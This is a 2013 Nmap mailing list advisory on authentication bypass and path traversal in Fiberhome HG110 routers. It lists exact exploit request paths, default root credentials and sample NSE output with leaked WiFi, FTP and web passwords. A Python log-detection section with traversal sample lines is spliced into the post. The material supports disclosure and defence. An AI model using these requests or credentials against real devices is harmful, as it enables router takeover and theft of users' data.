Nmap Development mailing list archives

[NSE] Vulnerabilities in Fiberhome HG110


From: Tom Sellers <nmap () fadedcode net>
Date: Mon, 08 Jul 2013 06:44:24 -0500

On April 8th, 2011, Zerial ( fernando () zerial org ) published[1] details of local file inclusion and directory traversal vulnerabilities in the Fiberhome HG110 wireless gateway. The documentation below expands upon his findings and provides a technical writeup of the impacts and vectors of these vulnerabilities. The attached script serves to provide concrete results from the vulnerabilities described.


Summary:  Authentication bypass and complete remote compromise via HTTPS management interface in the default configuration of the FiberHome residential wireless gateway.


Certain Central and South American subsidiaries of Telefonica distributed a customized version of the Fiberhome HG 110 wireless DSL gateway. The base device appears to be an often re-branded Linux based ZTE router. Analysis of both the Telefonica device and those it appears to have been derived from indicates that authentication and session management controls were broken during the customization process. This appears to be intentional, as the new authenticationless interface directly references files that would normally be protected. The result is that the HG 110 router suffers from a vulnerability that permits unauthenticated REMOTE access to configuration and status pages on the management interface. In addition to exposing information about the device and clients, this access permits the router to be configured without additional controls. The result is that the device can be remotely and completely compromised, permitting information disclosure, attack against client devices, and denial of service. It was not tested, but current information indicates that the ability to install malware and packet sniffing tools on the device is likely. Further, the initial reconnaissance and reconfiguration traffic would occur over SSL, which would prevent monitoring the nature of the activities. The only indicator of concern would be anomalous traffic from public IP addresses. If this traffic is kept to a minimum it would likely blend into the background noise of the Internet.


Known affected versions are HG110_BH_V1.6 and HG110_BH_V1.9.

The access vectors are on tcp ports 443 (SSL) and 8000 (HTTP).



Examples of abuse of this vulnerability include:

- Enabling remote SSH, TELNET, FTP and other services. As the root password appears to be 'root' on this and similar models, this change alone completely compromises this device. The insecure direct object reference vulnerability can be combined with the local file inclusion vulnerability to access the password hashes in the /etc/shadow file. This permits validating that the password has not been changed from 'root' prior to enabling SSH. Cracking the hash is not required, as all unmodified devices will have the same hash - '$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.'  Once the credentials are verified the attacker could enable SSH and remotely access the device as root.

Enabling SSH can be accomplished with a single, unauthenticated HTTP POST request.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services


- Forwarding of external ports to internal clients allowing direct attack of NAT/PAT'ed client devices.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd


- Hijacking client traffic by changing DNS configuration to point to malicious DNS servers.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=dns


- Compromise of all configuration details, including SSID and password/key, of the wireless network.

Path:  /cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=null
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlsecurity


- Disclosure of IP address, MAC address, connectivity type, status and sometimes hostnames of devices PAT/NAT'ed behind the router. Information about devices connected in the past, but without current leases, can also be captured.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=dhcpclients
Path:  /cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=null
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=wlclients
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=lan


- Compromise of Internet/PPP username

Path:  /cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=null
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wancfg


- Compromise of existing FTP server credentials and the ability to create new FTP accounts.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ftpd_count_manager


- Enabling the ability to re-locate a target router by configuring it to register with a dynamic DNS provider.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ddns


- Denial of service of remote hosts by way of SNMP amplification attack after enabling SNMP and permitting outside access.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=nwtools&var:subpage=snmp
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services


- Denial of service via reconfiguring many of the options and/or credentials


- Disclosure of device information, hardware, software and firmware versions, etc.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=deviceinfo


- Access to usernames and password hashes:

Path:  /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null
Path:  /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null


- Access to the SSL certificate private key. This key is reused on many models of devices. The thumbprint is 562e 7f2f 7b3d 5913 a6ca 64f2 5854 d131 e56c 4ff7
  Issuer CN = localhost.localdomain, OU = ODC, O = Multitech, L = Bangalore, S = Karnataka, C = IN

Path:  /cgi-bin/webproc?getpage=../../../etc/mini_httpd.pem&var:menu=advanced&var:page=null


- Access to dump a portion of the device's memory. This sometimes contains configuration data, log contents, and user traffic.

Path:  /cgi-bin/webproc?getpage=../../../dev/mem&var:menu=advanced&var:page=null


- Access to configuration information stored by the device

Path:  /cgi-bin/webproc?getpage=../../../usr/www/html/config/config.xml&var:menu=advanced&var:page=null


- Access to device hardware and state information

Path:  /cgi-bin/webproc?getpage=../../../proc/version&var:menu=advanced&var:page=null   (/proc/version)
Path:  /cgi-bin/webproc?getpage=../../../proc/cpuinfo&var:menu=advanced&var:page=null   (/proc/cpuinfo)
Path:  /cgi-bin/webproc?getpage=../../../proc/net/arp&var:menu=advanced&var:page=null   (/proc/net/arp)
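Every vector listed above has the same request shape: a GET or POST to /cgi-bin/webproc whose getpage parameter either names a management page or climbs out of the web root with ../ segments. For anyone watching one of these gateways from a reverse proxy or a syslog collector, that shape is what to look for, together with the one indicator the writeup itself names, management requests arriving from public addresses. The Python below is an added example and not the attached NSE script or any code from the original post. It assumes access-log lines in Common Log Format (the sample lines, addresses, timestamps and sizes are constructed; 203.0.113.0/24 is a documentation range standing in for an arbitrary public source) and flags three things: a decoded getpage value containing a ".." segment, a POST to any webproc page, and any webproc request from outside RFC 1918, link-local and loopback space.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in Common Log Format. The addresses,
# timestamps and sizes are made up; the request targets are ones the post lists.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jul/2013:06:44:24 -0500] "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=deviceinfo HTTP/1.1" 200 4121
203.0.113.7 - - [08/Jul/2013:06:44:25 -0500] "GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1" 200 512
203.0.113.7 - - [08/Jul/2013:06:44:26 -0500] "GET /cgi-bin/webproc?getpage=..%2F..%2F..%2Fetc%2Fmini_httpd.pem&var:menu=advanced&var:page=null HTTP/1.1" 200 3090
203.0.113.7 - - [08/Jul/2013:06:44:27 -0500] "POST /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services HTTP/1.1" 200 1800
192.168.1.33 - - [08/Jul/2013:06:50:01 -0500] "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic HTTP/1.1" 200 2200
192.168.1.33 - - [08/Jul/2013:06:50:05 -0500] "GET /images/logo.png HTTP/1.1" 200 900
"""

# Common Log Format: client ident user [time] "method target protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# RFC 1918 plus link-local and loopback; anything else counts as a remote source.
# ipaddress.is_private is deliberately not used here because it also treats the
# documentation range 203.0.113.0/24 as private, which would hide the sample source.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")]


def is_local(src):
    """True if src is on a LAN range; False for public or unparsable addresses."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in LOCAL_NETS)


def decoded_getpage(params):
    """Return the fully percent-decoded getpage value, or None if it is absent.

    parse_qs has already removed one layer of encoding; decoding until the value
    stops changing also catches %252e%252e-style double encoding.  Backslashes
    are normalised to slashes so the segment check below sees one separator.
    """
    values = params.get("getpage")
    if not values:
        return None
    value, previous = values[0], None
    while value != previous:
        previous, value = value, unquote(value)
    return value.replace("\\", "/")


def has_traversal(page):
    """True if any path segment of the getpage argument is '..'."""
    return any(segment == ".." for segment in page.split("/"))


def analyze_line(line):
    """Return a list of (category, source, detail) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    src, method, target = m.group(1), m.group(3), m.group(4)
    url = urlsplit(target)
    if url.path != "/cgi-bin/webproc":
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    page = decoded_getpage(params)
    var_page = params.get("var:page", [""])[0]
    findings = []
    if page and has_traversal(page):
        # getpage escaping the web root: the file inclusion / traversal vector
        findings.append(("traversal", src, page))
    if method.upper() == "POST":
        # the interface accepts configuration changes without authentication
        findings.append(("config-change", src, var_page))
    if not is_local(src):
        # management pages reached from outside the LAN
        findings.append(("remote-management", src, var_page))
    return findings


def analyze_log(text):
    """Run analyze_line over every non-empty line of an access log."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(analyze_line(line))
    return findings


if __name__ == "__main__":
    for category, src, detail in analyze_log(SAMPLE_LOG):
        print(f"{category:18} {src:15} {detail}")
```

Running the block over the sample log yields seven findings: two traversal hits (for /etc/shadow and, after percent-decoding, /etc/mini_httpd.pem), one configuration change on the accessctrl page, and a remote-management finding for each of the four webproc requests from the public address. The LAN client's wireless page view and the image fetch produce nothing, which is the intended baseline for a device that is only administered from inside.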



In addition to illustrating some of the issues listed above, the attached script also captures the web login password hashes that are present in the sign-on page's HTML. These hashes are compared to publicly known support passwords, which are indicated when found.



The following is output from the attached NSE script that illustrates the access and information gained using these vulnerabilities.

443/tcp open  https   syn-ack
| vuln-fiberhome-hg-router:
|   Device:
|     Manufacturer: FIBERHOME
|     Serial Number: a3c31648f14f
|     Hardware Ver: HG110_BH_R1A
|     Software Ver: HG110_BH_V1.9
|     Firmware Ver: 1.0.0
|     Kernel: Linux version 2.6.19
|     LAN Interface: 192.168.1.1( b8:c7:10:18:c3:1a )
|     Time: 2000-01-02T18:31:11
|   LAN:
|     Network: 192.168.1.1 / 255.255.255.0
|   DHCP:
|     Pool: 192.168.1.50 - 192.168.1.100
|     Active: True
|   WiFi:
|     SSID: Serg_WiFI2
|     Security: WPA
|     Password: log1n21
|     Channel: 0(AUTO)
|     Active: True
|   Internet:
|     Status: up
|     Speed: Down: 6,3Mb  Up: 309Kb
|     Type: DSL
|     User: 0010001290112@domain
|     Password:
|   Branding:
|     Branding: o2
|     Link: http://movistar.es
|     Country: CH
|     Default Language: es
|   Web Credential Hashes:
|     User               Hash
|     Administrador      $1$TW$4/4tmV7BKHXCDn5keBLUT1
|     user               $1$TW$dMolyCCNuy2WxyLJ.zUWv0  ( password is Need4$MVS.cl )
|     support            $1$TW$yS.Dzi9LPS3wn0qUQMBEA1  ( password is support )
|
|   FTP Credentials:
|     User      Password
|     ftpuser   S3cr3t
|
|   /etc/passwd:
|     #root:x:0:0:root:/root:/bin/bash
|     root:x:0:0:root:/root:/bin/sh
|     #tw:x:504:504::/home/tw:/bin/bash
|     #tw:x:504:504::/home/tw:/bin/msh
|   /etc/shadow:
|     #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
|     root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::  ( password is root )
|     #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|     #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|   DHCP Clients:
|     IP Address        MAC Address            Name
|     192.168.1.33      00:1b:b9:e1:21:af      sergio-PC
|     192.168.1.36      74:a7:22:2a:77:4f      android_ccaaa72b455fcc52
|
|   Device History:
|     IP Address                            MAC Address            Connection Type  Status
|     192.168.1.16                          D8:5D:4C:6F:89:E0      Ethernet         disconnected
|     192.168.1.33                          00:1b:b9:e1:21:af      Ethernet         disconnected
|     192.168.1.34                          f4:0b:93:f0:0f:a1      WiFi             disconnected
|     192.168.1.35                          fc:0f:e6:09:14:22      Ethernet         connected
|     192.168.1.34                          00:22:15:27:85:9d                       disconnected
|     169.254.235.110)00:1B:B9:A5:71:A      00:1B:B9:A5:71:A                        disconnected
|     192.168.1.36                          74:a7:22:2a:77:4f      WiFi             disconnected
|     186.172.129.206)74:A7:22:24:98:1      74:A7:22:24:98:1                        disconnected
|     192.168.1.35                          00:26:6c:ef:f3:95      Ethernet         disconnected
|     192.168.1.35                          e0:ca:94:bd:06:c5      WiFi             disconnected
|     192.168.1.36                          78:e4:00:b6:35:1a      WiFi             disconnected
|     192.168.1.37                          bc:b1:f3:25:53:e3      WiFi             disconnected
|     169.254.202.102)78:E4:00:B6:35:2      78:E4:00:B6:35:2                        disconnected
|     192.168.1.34                          58:c3:8b:5c:1b:3a      WiFi             disconnected
|_    192.168.1.34                          00:1A:73:93:82:4B      WiFi             disconnected


References:

1.  Local file inclusion publicly released in April 2011 by Zerial ( fernando () zerial.org)
http://osvdb.org/show/osvdb/71827
http://seclists.org/fulldisclosure/2011/Apr/132
http://seclists.org/fulldisclosure/2011/Apr/153
http://blog.zerial.org/seguridad/vulnerabilidad-en-todos-los-routers-fiberhome-hg-110-de-telefonicamovistar/



If the attached script is suitable for inclusion I will rename and commit it.


Tom Sellers


Attachment: vuln-fiberhome-hg-router.nse

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
